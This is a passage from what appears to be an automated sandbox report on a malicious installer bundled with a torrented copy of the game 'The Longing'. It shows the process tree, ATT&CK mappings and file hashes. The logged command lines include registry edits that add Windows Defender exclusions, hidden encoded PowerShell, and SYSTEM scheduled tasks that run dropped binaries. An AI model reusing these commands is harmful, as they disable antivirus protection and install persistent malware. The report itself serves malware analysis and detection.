    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5856)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:32
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 1892)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:64
[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4700)
    cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:64;"
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 6076)
    cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe (PID 6112)
    cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 2780)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5340)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5508)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5348)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5372)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:64
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5360)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5528)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:64
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5644)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5648)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 2800)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:32
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 4024)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 4732)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5676)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 444)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5704)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 4476)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5724)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 3516)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5732)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:64
[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5772)
    cmdline: schtasks /CREATE /TN "gsUNDBnMm" /SC once /ST 01:16:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 4860)
    cmdline: schtasks /run /I /tn "gsUNDBnMm"

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5212)
    cmdline: schtasks /DELETE /F /TN "gsUNDBnMm"

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5236)
    cmdline: schtasks /CREATE /TN "coQLnzjOCQIuUMNyn" /SC once /ST 02:06:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\fyArOsB.exe\" Tp /xsRZdidkg 757674 /S" /V1 /F
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 3484)
    cmdline: schtasks /run /I /tn "coQLnzjOCQIuUMNyn"
    - System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\WerFault.exe (PID 5248)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 952
    - Program crash
[depth 1] C:\Windows\system32\BackgroundTransferHost.exe (PID 5924)
    cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
    - Modifies registry class

[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 5808)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses

[depth 2] C:\Windows\system32\gpupdate.exe (PID 6060)
    cmdline: "C:\Windows\system32\gpupdate.exe" /force

[depth 1] C:\Windows\system32\svchost.exe (PID 692)
    cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

[depth 1] C:\Windows\system32\svchost.exe (PID 4644)
    cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

[depth 1] C:\Windows\system32\gpscript.exe (PID 2780)
    cmdline: gpscript.exe /RefreshSystemParam

[depth 1] C:\Windows\system32\werfault.exe (PID 4488)
    cmdline: werfault.exe /h /shared Global\84a8db342f8b424f8430d003de92c27b /t 1228 /p 3816
[depth 1] C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\fyArOsB.exe (PID 5308)
    cmdline: C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\fyArOsB.exe Tp /xsRZdidkg 757674 /S
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 3628)
    cmdline: schtasks /DELETE /F /TN "bhzAbyJhiYArNEwhRY"

[depth 2] C:\Windows\SysWOW64\cmd.exe (PID 4552)
    cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

[depth 3] C:\Windows\SysWOW64\forfiles.exe (PID 2848)
    cmdline: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery

[depth 4] C:\Windows\SysWOW64\cmd.exe (PID 4876)
    cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5244)
    cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[depth 6] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 3880)
    cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5580)
    cmdline: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OMeOFycTU\sDlzcs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VGggbamSlsorNxx" /V1 /F
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5044)
    cmdline: schtasks /CREATE /TN "VGggbamSlsorNxx2" /F /xml "C:\Program Files (x86)\OMeOFycTU\IbVSERq.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 4484)
    cmdline: schtasks /END /TN "VGggbamSlsorNxx"

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 3628)
    cmdline: schtasks /DELETE /F /TN "VGggbamSlsorNxx"
    - System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 3288)
    cmdline: schtasks /CREATE /TN "sWuJIXBYaMGWKZ" /F /xml "C:\Program Files (x86)\RnBNRnIwUzVU2\MhVtTAB.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 4556)
    cmdline: schtasks /CREATE /TN "NNeqJVkrzmhrs2" /F /xml "C:\ProgramData\TtvXSoLtbVXOCJVB\zdDFEPa.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 336)
    cmdline: schtasks /CREATE /TN "KHgAEdrkAvYTaiAFk2" /F /xml "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\ZPZMxro.xml" /RU "SYSTEM"
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5484)
    cmdline: schtasks /CREATE /TN "bvOgMXzRBPtqAKitkiY2" /F /xml "C:\Program Files (x86)\NOWTtjuGDiydC\tRAjDwC.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 5192)
    cmdline: schtasks /CREATE /TN "kWTyeDFhQZoEtpUUx" /SC once /ST 00:25:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\EcPinGxb\tBCcthG.dll\",#1 /CKCdidL 757674" /V1 /F
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 1028)
    cmdline: schtasks /run /I /tn "kWTyeDFhQZoEtpUUx"
    - System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe (PID 4848)
    cmdline: schtasks /DELETE /F /TN "coQLnzjOCQIuUMNyn"

[depth 2] C:\Windows\SysWOW64\WerFault.exe (PID 5284)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2116
    - Program crash

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 5300)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5824 -ip 5824
[depth 1] C:\Program Files\qBittorrent\qbittorrent.exe (PID 712)
    cmdline: "C:\Program Files\qBittorrent\qbittorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent"
    - Executes dropped EXE
    - Modifies registry class
    - NTFS ADS
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\EcPinGxb\tBCcthG.dll",#1 /CKCdidL 7576741⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2420 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\EcPinGxb\tBCcthG.dll",#1 /CKCdidL 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- System Network Configuration Discovery: Internet Connection Discovery
- Enumerates system info in registry
PID:3688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kWTyeDFhQZoEtpUUx"3⤵
- System Location Discovery: System Language Discovery
PID:5288
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1460 -ip 14601⤵PID:5188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4948 -ip 49481⤵PID:3288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5308 -ip 53081⤵PID:5296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1460 -ip 14601⤵PID:5548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1460 -ip 14601⤵PID:1692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1460 -ip 14601⤵PID:4628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1460 -ip 14601⤵PID:1380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1460 -ip 14601⤵PID:764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1460 -ip 14601⤵PID:5964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1460 -ip 14601⤵PID:1124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 14601⤵PID:2680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1460 -ip 14601⤵PID:4052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1460 -ip 14601⤵PID:5436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 14601⤵PID:3428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 14601⤵PID:1748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 14601⤵PID:4748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1460 -ip 14601⤵PID:236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1460 -ip 14601⤵PID:5852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 14601⤵PID:5324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:4748
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004E01⤵PID:2532
-
\??\E:\setup.exe"E:\setup.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\is-CLPM4.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CLPM4.tmp\setup.tmp" /SL5="$10548,3687301,168448,E:\setup.exe"2⤵
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 14601⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 14601⤵PID:3700
-
F:\Games\The Longing\The Longing.exe"F:\Games\The Longing\The Longing.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:964
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1376
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Indirect Command Execution (1)
- Modify Registry (2)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
-
Filesize
788KB
MD5702d90b2203e2a872d18ba18c35448fd
SHA1bd5127eff577a20032edb909581d3839ca27d9de
SHA2563d4dd2ba187224a0c41a8dbb7337487b53a07c588fe3beab47cc86162f64f485
SHA51293818bb1ef5facbf2ee57fb497f52c6e3ecb5fedf7c5f54658b5d36ed00475511adb56a93ad154bb8f3b96781a9c095cb5a1df62c1a955393c786c4f1da82ab3
-
Filesize
34.9MB
MD5bebf18e9f646943cfe8067ab60b3ad9e
SHA1d9dd3bb1190e70bcb338ffd713fd0c906b29d2c1
SHA256c8169df564f2b6bc12b0e0c1d8f628f5e7daafac5b94c5d92211ed631b68a551
SHA512531e0d546b02b1946010ca4b4ba8a26f34648efc315f75ba48d7ac534a7656c6c05d2c1a23e5a0ca80ffdc78ec133f4ba6601bb3ab6ce8392a88a8ec93093acb
-
Filesize
84B
MD5af7f56a63958401da8bea1f5e419b2af
SHA1f66ee8779ca6d570dea22fe34ef8600e5d3c5f38
SHA256fdb8fa58a6ffc14771ca2b1ef6438061a6cba638594d76d9021b91e755d030d3
SHA51202f70ca7f1291b25402989be74408eb82343ab500e15e4ac22fbc7162eb9230cd7061eaa7e34acf69962b57ed0827f51ceaf0fa63da3154b53469c7b7511d23d
-
Filesize
3.7MB
MD58b9c6e0ba4512eaec159936e4c275968
SHA1d1a8844733157fe0bdf7fe332b18f35d7c2232f9
SHA25607a5c84c76e3766c1bce75493f5763788d6e7d1060a028bf51a91d40fb2c3ece
SHA5123c1ad7df71ff07516282fda695f51bcf4ebf0c248d650f2fe538ff9593cb341debba740cb54df5f85fb6f5e9bba6fcae9613c2b4d400df01fcaa93064af0ce82
-
Filesize
630KB
MD5e477a96c8f2b18d6b5c27bde49c990bf
SHA1e980c9bf41330d1e5bd04556db4646a0210f7409
SHA25616574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c
-
Filesize
837B
MD5c04adc4ff6f809634f27f4ef0b5b0178
SHA178b905566e1aa095b980e5588631e5dce83bc226
SHA256fdb5bfd5645ed7db08ea9fd2a5e1fe93461205ccf87781e65ea5d7d3ba08974a
SHA512c5a1a961ba3aee3e809795706e204bfbbfea0c250d927df9411eebf588dd30d3e7a61c78efe7e4f0d74a0bbd8ea79eba2f719f55ed75bf55e60ec6a594af5b4a
-
Filesize
744B
MD52b72ab9bef1f431190bb460762c88b9d
SHA1330d28f1d492ad2fae4b8a3cadf982a6735e5c42
SHA256f3829d8a62c55b6d981aeacbf0e5ade6a470784b3d6a6b102de7e9cb24638275
SHA512142a71c44488bda047ef7c4e81d66ce09bc007dbffcb35a5b2ff33f61bf57587501738f72d62a145adc48540c423129660048e993956a4067db6045884fcb5f0
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
Filesize150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
